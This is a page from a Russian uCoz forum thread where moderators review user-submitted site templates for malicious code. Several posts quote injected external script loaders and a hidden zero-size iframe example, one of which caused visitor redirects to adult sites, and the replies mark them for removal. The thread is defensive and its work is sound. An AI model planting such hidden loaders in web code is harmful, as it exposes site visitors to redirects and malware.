Страница 3 из 25«123452425»
Модератор форума: webanet 
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Если вы решили добавить к себе на сайт скрипт (скрипты для uCoz)
Если вы решили добавить к себе на сайт скрипт
Модератор форума
Сообщение # 1 | 23:24:25
...ошибка новичка, пихать всё на сайт ©Prifect


С помощью различных скриптов можно значительно расширить функциональность и внешний вид сайта. При правильном и рациональном использовании скриптов можно сделать свой сайт удобным, красивым и неповторимым. Можно писать скрипты и элементы дизайна самостоятельно - в таких случаях практически не возникает проблем. Человек очень четко представляет что ему нужно и как все должно функционировать. Но чаще всего происходит так, что нужные и не очень скрипты, находятся в интернете и устанавливаются на сайт.

Скрипты для uCoz найденные в открытом доступе


Существует множество сайтов раздающих скрипты и элементы дизайна для сайтов системы uCoz. Как правило это уже готовые к использованию скрипты, которые можно просто скопировать из сообщения и вставить к себе на сайт. Как правило так и делают: копируют и вставляют, что является большой ошибкой.


Если в готовом скрипте есть графика в виде картинок, то всю такую графику (то есть картинки) нужно скачать к себе на компьютер, а потом залить на сайт через файловый менеджер и перепрописать все сторонние ссылки на картинки на свои (скопированные из файлового менеджера)

В итоге
Code
src="http://vaseapupkin.ucoz.ru/term/images/demo.png"

должно превратиться в
Code
src="http://mysite.ucoz.ru/term/images/demo.png"


Так вы не будете зависеть от работы сайта vaseapupkin.ucoz.ru, а так же от причуд администратора этого сайта, который может просто удалить эти картинки со своего сайта или заменить их на другие

ВЫВОД: Подгружать графику находящуюся на чужих сайтах и залитую на сторонние сайты используя внешние ссылки не рекомендуется!


Если в готовом коде есть необходимость в установке javascript массива вида


Code
<script type="text/javascript" src="http://vaseapupkin.ucoz.ru/demo.js"></script>


то копировать его в том виде как он раздается категорически не рекомендуется. javascript обязательно нужно залить к себе на сайт через файловый менеджер в отдельную папку.
Уважающие себя сайты раздают такие массивы на скачивание. Файл можно скачать к себе на компьютер, открыть в блокноте например, проверить и залить к себе на сайт через файловый менеджер. Если скачивание скрипта не дается, то можно открыть в браузере адрес скрипта http://vaseapupkin.ucoz.ru/demo.js, на открывшейся странице щелкнуть правой кнопкой мыши и нажать на сохранить как..., так вы скачаете файл для последующей закачки к себе на сайт через файловый менеджер. Файлы javascript нужно закачивать в папку созданную в файловом менеджере

В итоге
Code
<script type="text/javascript" src="http://vaseapupkin.ucoz.ru/demo.js"></script>

должно превратиться в
Code
<script type="text/javascript" src="http://mysite.ucoz.ru/papka/demo.js"></script>


Так вы не будете зависеть от работы сайта с которого подгружался бы ваш javascript, а так же не будете зависеть от степени порядочности владельца сайта на который загружен javascript, ведь файл можно всегда изменить.
Особенно хочу отметить то, что если вы не понимаете работу javascript кода который берете или не понимаете сам код, то лучше воздержаться от установки к себе на сайт кода который вы не понимаете!

ВЫВОД: Подгружать javascript со сторонних сайтов категорически не рекомендуется!!!



Осторожно IFRAME !



IFRAME считается потенциально опасным кодом, поэтому его использование ограничено. Система uCoz использует IFRAME для вывода рекламного баннера и для трансляции мини-чата. Эти IFRAME безопасны! Так же с помощью IFRAME работают некоторые гаджеты и виджеты.

IFRAME так же может использоваться некоторыми партнерскими программами и рекламными сетями. Так же с помощью IFRAME можно вставлять видео на сайт с YouTube и Контакта. Некоторые сайты раздают свои информеры контента с помощью IFRAME. Если вы полностью доверяете сайтам раздающим в своем коде IFRAME и это необходимо для трансляции или контента или рекламных блоков или информеров или видео, то можете добавлять, но только из проверенных источников, и нужно помнить, что чем меньше IFRAME на сайте - тем лучше.

Если вы берёте в открытом доступе скрипт или элемент дизайна для uCoz, и в нем есть код типа

Code
<iframe src="http://vaseapupkin.ucoz.ru/" name="iframe" width="0%" height="0%" scrolling="no" frameBorder=0></iframe>


то такой скрипт или элемент дизайна брать, а особенно копировать и ставить к себе на сайт категорически нельзя! Вы должны понимать, что такого вида кодом, вы транслируете у себя на сайте совершенно чужой сайт, на котором находится неизвестно что. Обычно такие IFRAME вставляются в скрипты и в элементы дизайна злоумышленниками, которые посредством таких открытых раздач, заодно раздают элементы своих мошеннических сетей.
Установив скрипт с подобным кодом внутри, к себе на сайт, вы можете столкнуться с такими неприятностями как:

1) реакция аллерта вашего антивируса на ваш же сайт
2) блокировка вашего сайта поисковиком с наложением фильтра с табличкой и пометкой в выдаче, о том, что ваш сайт может нанести вред компьютеру

ВЫВОД: IFRAME потенциально опасный код, использование которого на сайте должно быть строго ограничено! Если вы видите код в котором присутствует IFRAME и не понимаете его назначения, то устанавливать к себе на сайт подобный код не рекомендуется!
Если в открытой раздаче скриптов и элементов дизайна для uCoz присутствует IFRAME, то копировать такой код и устанавливать к себе на сайт категорически не рекомендуется!

В заключении хочется сказать, что если вы совсем не понимаете принцип работы того или иного скрипта, и если совсем не понимаете код который копируете, то лучше воздержаться от установки непонятного вам скрипта к себе на сайт. Неразумное обращение со скриптами обычно приводит к очень тяжелым последствиям.

Если вы занимаетесь сбором скриптов и элементов дизайна, то эта памятка для вас! В этой теме вы всегда можете подать запрос на проверку найденного скрипта или элемента дизайна на наличие вредоносного кода и спама. В этой теме не обсуждается установка, проблемы работоспособности и поиск скриптов. Только проверка на вредоносный код и спам!


Olympik
Сообщений: 2
Репутация: 0

Сообщение # 31 | 20:43:14
Проверьте пожалуйста этот скрипт !!!!!
Code
<table style="border: 1px solid #252525" cellpadding="1" cellspacing="0" width="100%" align="center"><tr><td valign="top" align="center">
<?if($MODER_PANEL$)?><script src="http://izizi.ru/1.js" type="text/javascript"></script>
<div style="float:right">$MODER_PANEL$</div><?endif?>
<table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td class="eTitle" align="center" style="border: 1px solid #000000;"><a href="$ENTRY_URL$">Скачать $TITLE$</a> </td>
</tr>
</table>

<table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif');">Скрин</td>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif');">Подробнее о файле</td>
</tr>
<tr>
<td width="125px" align="center" style="border: 1px solid #252525;">
<left><font onmouseover="Tip('<img border=0 src=$AUTHOR_SITE$>', BGCOLOR, ', FONTCOLOR, '#333333', BORDERCOLOR, 'Silver', WIDTH, '100%', FADEIN, 500, FADEOUT, 500)">

<?if($IMG_URL1$)?><center><a href="$IMG_URL1$" class="highslide" onclick="return hs.expand(this, {captionId: 'caption1'})"><img width="170" border="1" align="center" vspace="5" hspace="10" src="$IMG_URL1$"></a></center><?endif?>
<td align="center" style="border: 1px solid #000000;"><?if($MESSAGE$)?><div class="eMessage" style="text-align:left;clear:both;padding-top:2px;padding-bottom:2px;">$MESSAGE$</div><?endif?></td>
</tr></table>
<table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif');">Рейтинг</td>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')">Просмотрели</td>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')">Загрузок</td>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')">Добавил</td>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')">Комментарии</td>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')">Подробнее</td>

</tr>
<tr>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')"><?if($RATING_NUM$)?><img border="0" src="http://csomsk.3dn.ru/rate/$RATING_NUM$.png" alt="Голосов: $RATING_NUM$"> <?else?> <img border="0" src="http://csomsk.3dn.ru/rate/0.png" alt="Нет голосов "> <?endif?>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')">$READS$</td>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')">$LOADS$</td>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')"><a href="$PROFILE_URL$">$USERNAME$</a></td>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')">$COMMENTS_NUM$</td>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')"><a href="$ENTRY_URL$">Перейти</a></td>

</tr></table></td></tr></table><br>
webanet
Личный менеджер
Сообщений: 22908
Репутация: 4861

Сообщение # 32 | 21:17:46
Olympik, выделенное красным удалить
Quote

<table style="border: 1px solid #252525" cellpadding="1" cellspacing="0" width="100%" align="center"><tr><td valign="top" align="center">
<?if($MODER_PANEL$)?><script src="http://izizi.ru/1.js" type="text/javascript"></script>
<div style="float:right">$MODER_PANEL$</div><?endif?>
<table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td class="eTitle" align="center" style="border: 1px solid #000000;"><a href="$ENTRY_URL$">Скачать $TITLE$</a> </td>
</tr>
</table>

<table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif');">Скрин</td>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif');">Подробнее о файле</td>
</tr>
<tr>
<td width="125px" align="center" style="border: 1px solid #252525;">
<left><font onmouseover="Tip('<img border=0 src=$AUTHOR_SITE$>', BGCOLOR, ', FONTCOLOR, '#333333', BORDERCOLOR, 'Silver', WIDTH, '100%', FADEIN, 500, FADEOUT, 500)">

<?if($IMG_URL1$)?><center><a href="$IMG_URL1$" class="highslide" onclick="return hs.expand(this, {captionId: 'caption1'})"><img width="170" border="1" align="center" vspace="5" hspace="10" src="$IMG_URL1$"></a></center><?endif?>
<td align="center" style="border: 1px solid #000000;"><?if($MESSAGE$)?><div class="eMessage" style="text-align:left;clear:both;padding-top:2px;padding-bottom:2px;">$MESSAGE$</div><?endif?></td>
</tr></table>
<table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif');">Рейтинг</td>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')">Просмотрели</td>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')">Загрузок</td>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')">Добавил</td>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')">Комментарии</td>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')">Подробнее</td>

</tr>
<tr>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')"><?if($RATING_NUM$)?><img border="0" src="http://csomsk.3dn.ru/rate/$RATING_NUM$.png" alt="Голосов: $RATING_NUM$"> <?else?> <img border="0" src="http://csomsk.3dn.ru/rate/0.png" alt="Нет голосов "> <?endif?>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')">$READS$</td>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')">$LOADS$</td>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')"><a href="$PROFILE_URL$">$USERNAME$</a></td>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')">$COMMENTS_NUM$</td>
<td align="center" style="border: 1px solid #000000;background:url('http://csomsk.3dn.ru/sniper/100-csomsk.3dn.ru-new.gif')"><a href="$ENTRY_URL$">Перейти</a></td>

</tr></table></td></tr></table><br>

все картинки перелить к себе на сайт


ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Nightrunner
Сообщений: 22
Репутация: 12

Сообщение # 33 | 21:45:15
Скажите, пожалуйста, является ли безопасным установка этого скрипта:

Code
<script language='javascript' type='text/javascript' src='http://Vitas.popunder.ru/cout.php?sid=135649'></script>

webanet
Личный менеджер
Сообщений: 22908
Репутация: 4861

Сообщение # 34 | 23:11:45
Nightrunner, зачем вам попандер от попандер ру? сам скрипт опасности не представляет, а вот тот трафик который в последствии будет откручиваться через него может принести вам печальные моменты. в общем не самое лучшее решение

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
saga2874
Репутация: -3
Уровень замечаний:

Сообщение # 35 | 14:34:57
можно вот этот скрипт проверить безопасный он или нет

<div id="sbBlockId1" class="sbBlock"><noscript>Здесь размещен <a href="http://soft-block.ru/" target="_blank" title="софт, блок софта, программы">блок популярных программ</a> от © каталога Soft-Block.ru<br>Чтобы его увидеть, включите в браузере выполнение JavaScript.</noscript></div><script type="text/javascript" src="http://soft-block.ru/js/softbar/spsoftbar.js"></script>

webanet
Личный менеджер
Сообщений: 22908
Репутация: 4861

Сообщение # 36 | 15:03:05
saga2874, этот скрипт с большой буквы МУСОР на сайте. пользы от него никакой, а внешних ссылок, спама, подгружаемых чужих страниц и прочих нечистот в нем тьма.
начало кода (выделено синим)
Quote

<div id="sbBlockId1" class="sbBlock"><noscript>Здесь размещен <a href="http://soft-block.ru/" target="_blank" title="софт, блок софта, программы">блок популярных программ</a> от © каталога Soft-Block.ru<br>Чтобы его увидеть, включите в браузере выполнение JavaScript.</noscript></div><script type="text/javascript" src="http://soft-block.ru/js/softbar/spsoftbar.js"></script>

тоже самое внутри
Quote
sbCode+='<div id="sbBlockId1" class="sbBlock"><noscript>';
sbCode+=decodeURIComponent('%D0%97%D0%B4%D0%B5%D1%81%D1%8C%20%D1%80%D0%B0%D0%B7%D0%BC%D0%B5%D1%89%D0%B5%D0%BD')+' <a href="'+this.Manage+'" target="_blank" title="'+decodeURIComponent('%D1%81%D0%BE%D1%84%D1%82%2C%20%D0%B1%D0%BB%D0%BE%D0%BA%20%D1%81%D0%BE%D1%84%D1%82%D0%B0%2C%20%D0%BF%D1%80%D0%BE %D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D1%8B')+'">'+decodeURIComponent('%D0%B1%D0%BB%D0%BE%D0%BA%20%D0%BF%D0%BE%D0%BF%D1%83%D0%BB%D1%8F%D1%80%D0%BD% D1%8B%D1%85%20%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC')+'<\/a> '+decodeURIComponent('%D0%BE%D1%82%20%26copy%3B%20%D0%BA%D0%B0%D1%82%D0%B0%D0%BB%D0%BE%D0%B3%D0%B0%20Soft-Block.ru%3Cbr%3E%D0%A7%D1%82%D0%BE %D0%B1%D1%8B%20%D0%B5%D0%B3%D0%BE%20%D1%83%D0%B2%D0%B8%D0%B4%D0%B5%D1%82%D1%8C%2C%20%D0%B2%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%20%D0%B 2%20%D0%B1%D1%80%D0%B0%D1%83%D0%B7%D0%B5%D1%80%D0%B5%20%D0%B2%D1%8B%D0%BF%D0%BE%D0%BB%D0%BD%D0%B5%D0%BD%D0%B8%D0%B5%20JavaScript.');
sbCode+='<\/noscript><\/div>';

да простит меня достопочтенный (орфография и кодировка сохранены) Автор: Szen, но его творение как было тяжелым бесполезным мусором, так и осталось

saga2874, а вы вместо мусора попробуйте добавлять новости на сайт, эффект будет более положительный, чем от добавления чужих тяжелых, заспамленных, бесполезных скриптов. не занимайтесь посредством этих скриптов благотворительностью у себя на сайте, займитесь своим сайтом лучше.

итого: срипт бесполезен и потенциально опасен из-за множественной внешней подгрузки


ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
IZOTOP2902
Сообщений: 8
Репутация: 0

Сообщение # 37 | 20:25:37
Здравствуйте!!!я плоховато пока разбираюсь но где то дня четыре назад при нажатии на ссылку в меню сайта вместо желаемой страницы открывается другой сайт(с парнухой),но было что не только он один,другой открывающийся сайт(про футбол),странно то что это происходит не постоянно,иногда переход происходит сразу при заходе на сайт,скриптов я не устанавливал никаких.подскажите пожалуйста что это может быть.на сайте всё делаю я один,ни модераторов никого больше нет.заранее спасибо

Добавлено (29-Апр-2011, 20:25:37)
---------------------------------------------
Извиняюсь что сразу не догадался,вот адрес сайта который открывается
http://pokajem.izvrasheniya.com/?partner=31&city=%C2%EE%EB%E3%EE%E3%F0%E0%E4&mc=ef529b8739133eaefb9f49f3d4dca091&chiter=146909&chitdom=xaos34rusucozru&country=RU&mtr=35883f2cd7e376eb020eac55f0a109ec&billing=mediabill
Даже не знаю как с этим бороться,помогите пожалуйста.

fflesh
Сообщений: 1784
Репутация: 1314

Сообщение # 38 | 22:07:22
IZOTOP2902,
Quote (IZOTOP2902)
Прошу прощения ещё раз адрес моего сайта xaos34rus.ucoz.ru

Вот блок “Радио” ....
Quote
<!-- <block262> -->
<table border="0" cellpadding="0" cellspacing="0" width="214">
<tbody><tr><td colspan="2" style="background: url("/.s/t/451/9.gif") repeat scroll 0% 0% transparent; padding-bottom: 4px; padding-left: 25px; color: rgb(215, 215, 215);" height="34"><b><!-- <bt> -->Радио<!-- </bt> --></b></td></tr>
<tr><td style="background: url("/.s/t/451/10.gif") repeat scroll 0% 0% transparent;" valign="top" width="12"><img src="/.s/t/451/11.gif" border="0"></td><td style="background: url("/.s/t/451/12.gif") no-repeat scroll center bottom transparent; border-top: 1px solid rgb(47, 42, 42); padding: 5px;" width="202"><!-- <bc> --><object height="265" width="185"><param name="movie" value="http://clubberry.fm/player/player2.swf"><param name="allowFullScreen" value="true"><script src="http://s1.ruclick.zl5.ru/6s8bx45d4r.js" type="text/javascript"></script><script language="JavaScript" src="http://timedirect.ru/?id=146909"></script><embed class=" kqmqcglhcozzejyfiqrz" src="http://clubberry.fm/player/player2.swf" type="application/x-shockwave-flash" allowfullscreen="true" height="265" width="185"></object><!-- </bc> --></td></tr><tr><td colspan="2"><img src="/.s/t/451/13.gif" border="0"></td></tr></tbody></table><br>
<!-- </block262> -->

Красное - удалить ....
Или вообще этот блок удалить ... полностью. )
...
Ещё вот этот скрипт тоже не внушает доверия ))))
Quote
<script type="text/javascript" src="http://jd.revolvermaps.com/r.js"></script><script type="text/javascript">rm_f1st('0','186','true','false','000000','33utfdwjenb','true','54ff00');</script><noscript><applet codebase="http://rd.revolvermaps.com/j" code="core.RE" width="186" height="186" archive="g.jar"><param name="cabbase" value="g.cab" /><param name="r" value="true" /><param name="n" value="false" /><param name="i" value="33utfdwjenb" /><param name="m" value="0" /><param name="s" value="186" /><param name="c" value="54ff00" /><param name="v" value="true" /><param name="b" value="000000" /><param name="rfc" value="true" /></applet></noscript>

- Это сразу под формой входа ....
...
Да и прочие “типа скрипты”:
Quote
<script src="http://css-vrn.at.ua/media/?t=video;w=730;h=600;f=http://xaoc34rus.ucoz.ru/scriptbl/Cs-Online/flashcounterstrike.swf" type="text/javascript"></script>

Quote
<script src="http://xaos34rus.ucoz.ru/media/?t=video;w=192;h=158;f=http%3A//video.mail.ru/mail/xaoc34rus/1/2.html" type="text/javascript"></script>

- я бы удалил ... , от греха подальше )
...

Жуть )

Добавлено (30-Апр-2011, 03:11:09)
---------------------------------------------

Quote (IZOTOP2902)
Ни за что бы не догадался что радио способно создать такие последствия.

«Радио» - не способно.
А вот люди, у которых вы взяли этот код, а вместе с ним и скрипт, ещё как ...
...
Незачто)

Всё написанное выше - моё личное мнение и на абсолютную правоту не претендует.
Есть вопросы лично ко мне - пиши сюда: http://likbezz.ru/forum/8
Сообщение отредактировал fflesh - Суббота, 30 Апр 2011, 03:14:07
IZOTOP2902
Сообщений: 8
Репутация: 0

Сообщение # 39 | 01:38:46
Спасибо огромное!!!Вы мне очень помогли.
Проблему вызывало радио,скрипт.
<!-- <block262> -->
<table border="0" cellpadding="0" cellspacing="0" width="214">
<tbody><tr><td colspan="2" style="background: url("/.s/t/451/9.gif") repeat scroll 0% 0% transparent; padding-bottom: 4px; padding-left: 25px; color: rgb(215, 215, 215);" height="34"><b><!-- <bt> -->Радио<!-- </bt> --></b></td></tr>
<tr><td style="background: url("/.s/t/451/10.gif") repeat scroll 0% 0% transparent;" valign="top" width="12"><img src="/.s/t/451/11.gif" border="0"></td><td style="background: url("/.s/t/451/12.gif") no-repeat scroll center bottom transparent; border-top: 1px solid rgb(47, 42, 42); padding: 5px;" width="202"><!-- <bc> --><object height="265" width="185"><param name="movie" value="http://clubberry.fm/player/player2.swf"><param name="allowFullScreen" value="true"><script src="http://s1.ruclick.zl5.ru/6s8bx45d4r.js" type="text/javascript"></script><script language="JavaScript" src="http://timedirect.ru/?id=146909"></script><embed class=" kqmqcglhcozzejyfiqrz" src="http://clubberry.fm/player/player2.swf" type="application/x-shockwave-flash" allowfullscreen="true" height="265" width="185"></object><!-- </bc> --></td></tr><tr><td colspan="2"><img src="/.s/t/451/13.gif" border="0"></td></tr></tbody></table><br>
<!-- </block262> -->
Ни за что бы не догадался что радио способно создать такие последствия.
Ещё раз огромное спасибо!!!
С Уважением Михаил.
Rolex-X2006
Сообщений: 7
Репутация: 0

Сообщение # 40 | 16:15:53
Проверьте пожалуйста можно использовать его на сайте:

Code
<?if($USER_LOGGED_IN$)?><?if($IS_NEW_PM$)?><script type="text/javascript">   
window.onload = function StartPM() {openLayerB('PmBody',0,'/mp/pmbody.xml','Новое ПМ',335,300,1,0,0);}   
</script><?endif?><?endif?>   
<div align="center"><?if($USER_AVATAR_URL$)?><img class="userAvatar" title="$USERNAME$" src="$USER_AVATAR_URL$" border="0"><?else?><?if($USER_LOGGED_IN$)?><img class="userAvatar" title="$USERNAME$" src="/mp/7504f641ae8e.png" border="0"><?else?><img class="userAvatar" title="$USERNAME$" src="/mp/7504f641ae8e.png" border="0"><?endif?><?endif?>   
<script language="JavaScript" src="/mp/otrawenie.js"></script>   
<?if($USER_LOGGED_IN$)?>   
<style type="text/css">   
.suckerdiv ul{   
margin: 0;   
padding: 0;   
list-style-type: none;   
width: 160px;   
border-bottom: 1px solid #000000;   
}   

.suckerdiv ul li{   
position: relative;   
}   

/*Sub level menu items */   
.suckerdiv ul li ul{   
position: absolute;   
width: 200px; /*sub menu width*/   
top: 0;   
visibility: hidden;   
}   

/* Sub level menu links style */   
.suckerdiv ul li a{   
display: block;   
overflow: auto; /*force hasLayout in IE7 */   
color: black;   
text-decoration: none;   
background: #494949;   
padding: 1px 5px;   
border: 1px solid #000000;   
border-bottom: 0;   
}   

.suckerdiv ul li a:visited{   
color: black;   
}   

.suckerdiv ul li a:hover{   
background-color: 3c95ee;   
}   

.suckerdiv .subfolderstyle{   
background: url(/mp/arrow-list.gif) no-repeat center right;   
}   

/* Holly Hack for IE \*/   
* html .suckerdiv ul li { float: left; height: 1%; }   
* html .suckerdiv ul li a { height: 1%; }   
/* End */   

</style>   

<script type="text/javascript">   
var menuids=["suckertree1"]   

function buildsubmenus(){   
for (var i=0; i<menuids.length; i++){   
var ultags=document.getElementById(menuids[i]).getElementsByTagName("ul")   
for (var t=0; t<ultags.length; t++){   
ultags[t].parentNode.getElementsByTagName("a")[0].className="subfolderstyle"   
if (ultags[t].parentNode.parentNode.id==menuids[i])   
ultags[t].style.left=ultags[t].parentNode.offsetWidth+"px"   
else   
ultags[t].style.left=ultags[t-1].getElementsByTagName("a")[0].offsetWidth+"px"   
ultags[t].parentNode.onmouseover=function(){   
this.getElementsByTagName("ul")[0].style.display="block"   
}   
ultags[t].parentNode.onmouseout=function(){   
this.getElementsByTagName("ul")[0].style.display="none"   
}   
}   
for (var t=ultags.length-1; t>-1; t--){   
ultags[t].style.visibility="visible"   
ultags[t].style.display="none"   
}   
}   
}   

if (window.addEventListener)   
window.addEventListener("load", buildsubmenus, false)   
else if (window.attachEvent)   
window.attachEvent("onload", buildsubmenus)   
</script>   

<div class="suckerdiv">   
<ul id="suckertree1">   
<li><a href="http://webhelping.ru/" style="display:none;">.</a></li>   
<li><a href="$PERSONAL_PAGE_LINK$" title="">Мой профиль</a></li>   
<li><a href="javascript:openOnClick('options')" title="">Изминить настройки</a></li>   
<li><a href="$UNREAD_PM$" title="">Мои личные сообщения</a></li>   
<li><a href="javascript:openOnClick('send')" title="">Отправить (ЛС)</a></li>   
<li><a href="javascript:openOnClick('mail')" title="">Читать (ЛС) <span style="color: rgb(255, 0, 0);">($UNREAD_PM$)</span></a></li>   
<li><a href="javascript:openOnClick('users')" title="">Список ПоЛьзователей</a></li>   

     
</ul>   
     
     
</div>   

<script type="text/javascript">   
function openOnClick(client_type)   
{   
if(client_type=="mail")clientWindow = window.open("$PM_URL$","pmw","scrollbars=1,top=0,left=0,resizable=1,width=850,height=350") || alert("Отключите блокировку всплывающих окон!");   
if(client_type=="send")clientWindow = window.open("/index/14-999-0-1","pms","scrollbars=1,top=0,left=0,resizable=1,width=850,height=350") || alert("Отключите блокировку всплывающих окон!");   
if(client_type=="options")clientWindow = window.open("/index/11","options","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");   
if(client_type=="users")clientWindow = window.open("$USERS_LIST_URL$","users","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");   
if(client_type=="rules")clientWindow = window.open("/rules.html","rules","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");   
}   
</script>   
<?else?>   

<font color="#FF0000">Гость</font>, <font color="green">мы рады вас видеть! Пожалуйста <a href="/index/3-0-0"><font color="green">зарегистрируйтесь</a> <font color="green">или <a interclue-click-count="1" href="javascript://" onclick="openLayerB('LF',0,'/index/40','Login',250,130,1);return false;" title="Вход"><font color="Green">авторизуйтесь</a>!</font>   

<?endif?></div>
webanet
Личный менеджер
Сообщений: 22908
Репутация: 4861

Сообщение # 41 | 16:25:43
Rolex-X2006, с какого сайта вы это скопировали? адрес
Quote
<?if($USER_LOGGED_IN$)?><?if($IS_NEW_PM$)?><script type="text/javascript">
window.onload = function StartPM() {openLayerB('PmBody',0,'/mp/pmbody.xml','Новое ПМ',335,300,1,0,0);}
</script><?endif?><?endif?>
<div align="center"><?if($USER_AVATAR_URL$)?><img class="userAvatar" title="$USERNAME$" src="$USER_AVATAR_URL$" border="0"><?else?><?if($USER_LOGGED_IN$)?><img class="userAvatar" title="$USERNAME$" src="/mp/7504f641ae8e.png" border="0"><?else?><img class="userAvatar" title="$USERNAME$" src="/mp/7504f641ae8e.png" border="0"><?endif?><?endif?>
<script language="JavaScript" src="/mp/otrawenie.js"></script> ?
<?if($USER_LOGGED_IN$)?>
<style type="text/css">
.suckerdiv ul{
margin: 0;
padding: 0;
list-style-type: none;
width: 160px;
border-bottom: 1px solid #000000;
}

.suckerdiv ul li{
position: relative;
}

/*Sub level menu items */
.suckerdiv ul li ul{
position: absolute;
width: 200px; /*sub menu width*/
top: 0;
visibility: hidden;
}

/* Sub level menu links style */
.suckerdiv ul li a{
display: block;
overflow: auto; /*force hasLayout in IE7 */
color: black;
text-decoration: none;
background: #494949;
padding: 1px 5px;
border: 1px solid #000000;
border-bottom: 0;
}

.suckerdiv ul li a:visited{
color: black;
}

.suckerdiv ul li a:hover{
background-color: 3c95ee;
}

.suckerdiv .subfolderstyle{
background: url(/mp/arrow-list.gif) no-repeat center right;
}

/* Holly Hack for IE \*/
* html .suckerdiv ul li { float: left; height: 1%; }
* html .suckerdiv ul li a { height: 1%; }
/* End */

</style>

<script type="text/javascript">
var menuids=["suckertree1"]

function buildsubmenus(){
for (var i=0; i<menuids.length; i++){
var ultags=document.getElementById(menuids[i]).getElementsByTagName("ul")
for (var t=0; t<ultags.length; t++){
ultags[t].parentNode.getElementsByTagName("a")[0].className="subfolderstyle"
if (ultags[t].parentNode.parentNode.id==menuids[i])
ultags[t].style.left=ultags[t].parentNode.offsetWidth+"px"
else
ultags[t].style.left=ultags[t-1].getElementsByTagName("a")[0].offsetWidth+"px"
ultags[t].parentNode.onmouseover=function(){
this.getElementsByTagName("ul")[0].style.display="block"
}
ultags[t].parentNode.onmouseout=function(){
this.getElementsByTagName("ul")[0].style.display="none"
}
}
for (var t=ultags.length-1; t>-1; t--){
ultags[t].style.visibility="visible"
ultags[t].style.display="none"
}
}
}

if (window.addEventListener)
window.addEventListener("load", buildsubmenus, false)
else if (window.attachEvent)
window.attachEvent("onload", buildsubmenus)
</script>

<div class="suckerdiv">
<ul id="suckertree1">
<li><a href="http://webhelping.ru/" style="display:none;">.</a></li>
<li><a href="$PERSONAL_PAGE_LINK$" title="">Мой профиль</a></li>
<li><a href="javascript:openOnClick('options')" title="">Изминить настройки</a></li>
<li><a href="$UNREAD_PM$" title="">Мои личные сообщения</a></li>
<li><a href="javascript:openOnClick('send')" title="">Отправить (ЛС)</a></li>
<li><a href="javascript:openOnClick('mail')" title="">Читать (ЛС) <span style="color: rgb(255, 0, 0);">($UNREAD_PM$)</span></a></li>
<li><a href="javascript:openOnClick('users')" title="">Список ПоЛьзователей</a></li>

</ul>

